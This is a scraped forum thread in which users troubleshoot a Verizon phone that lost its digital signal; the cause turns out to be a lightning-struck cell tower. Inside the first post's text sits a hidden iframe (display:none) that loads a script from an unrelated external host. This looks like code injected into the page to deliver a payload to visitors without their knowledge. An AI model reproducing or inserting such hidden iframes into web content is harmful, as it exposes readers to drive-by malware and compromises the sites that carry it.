+ Reply to Thread
Results 1 to 9 of 9
  1. #1
    Registered User
    Join Date
    10-22-2002
    Posts
    120

    Not dead, but on life support!

    Well, I was writing away on a text message when I suddenly lost my phone connection (Usually full strenth digital at work). I have done a soft reset, but the phone is just "searching for signal". Is there an easy way to check and see if verizon's tower is down? If I go outside I can pick up a faint anolog signal, so I'm thinking it might be the tower. Any suggestions??????
    :anger :anger :anger :anger<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If at first you don't succeed, don't try sky diving.

  2. #2
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    I had the same thing happen to me about a week ago. The phone just kept searching for a signal. I turned on my old StarTac and it immediately got a strong digital signal. I was pretty sure there was something wrong with the phone and was about to call Kyo support when it found a signal and all was well. The whole thing lasted maybe a half hour. It hasn't happened again. I am chalking it up to a cosmic glitch.

  3. #3
    Registered User dwdod's Avatar
    Join Date
    07-01-2001
    Location
    Metro Washington D.C. area
    Posts
    2,085
    Originally posted by Lnoble
    I had the same thing happen to me about a week ago. The phone just kept searching for a signal. I turned on my old StarTac and it immediately got a strong digital signal. I was pretty sure there was something wrong with the phone and was about to call Kyo support when it found a signal and all was well. The whole thing lasted maybe a half hour. It hasn't happened again. I am chalking it up to a cosmic glitch.
    Ahhh...the cosmic glitch. What a useful concept. I can't begin to count the number of mysteries in my life that have been explained very succinctly by a cosmic glitch. Whatever would we do without it...
    Dave

  4. #4
    Registered User
    Join Date
    10-22-2002
    Posts
    120
    Well, mine is at 3 hours and counting. Maybe when I go home it'll pick up another tower and I'll find out this tower is out. If not I'll be doing a hard reset tonight.
    If at first you don't succeed, don't try sky diving.

  5. #5
    Registered User
    Join Date
    10-22-2002
    Posts
    120

    Off lifesupport

    Good news. The tower by my work was struck by lightning. The tower by my home works fine.

  6. #6
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264

    Re: Off lifesupport

    Originally posted by Steve B.
    Good news. The tower by my work was struck by lightning.
    While I know what you mean, I still got a good chuckle from the combination of these two sentences!

  7. #7
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    LOL!! i see your point Turbo.. :grofl2

  8. #8
    Registered User
    Join Date
    08-17-2002
    Posts
    444

    Return of the Cosmic Glitch

    After yesterday's discussion of the phone not picking up a signal, it happened to me this morining. (This is the second time for me.) The phone went into analog and I can't get it back to digital. It was consisten on my 16 mile trip to downtown D.C., so I doubted it was VZW. If I change the settings to digital only, it just goes searching. I called VZW and was told they can't help and I have to call Kyo for technical support. So, it looks like I have either been hit by a second cosmic glitch or there is something wrong with the phone. I am now going to call Kyo.

  9. #9
    Registered User
    Join Date
    10-22-2002
    Posts
    120

    Re: Re: Off lifesupport

    Originally posted by turboCat
    While I know what you mean, I still got a good chuckle from the combination of these two sentences!
    lol - I guess I'd prefer to find Saddam hiding WMD in my back yard as opposed to something wrong with my precious 7135.
    If at first you don't succeed, don't try sky diving.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts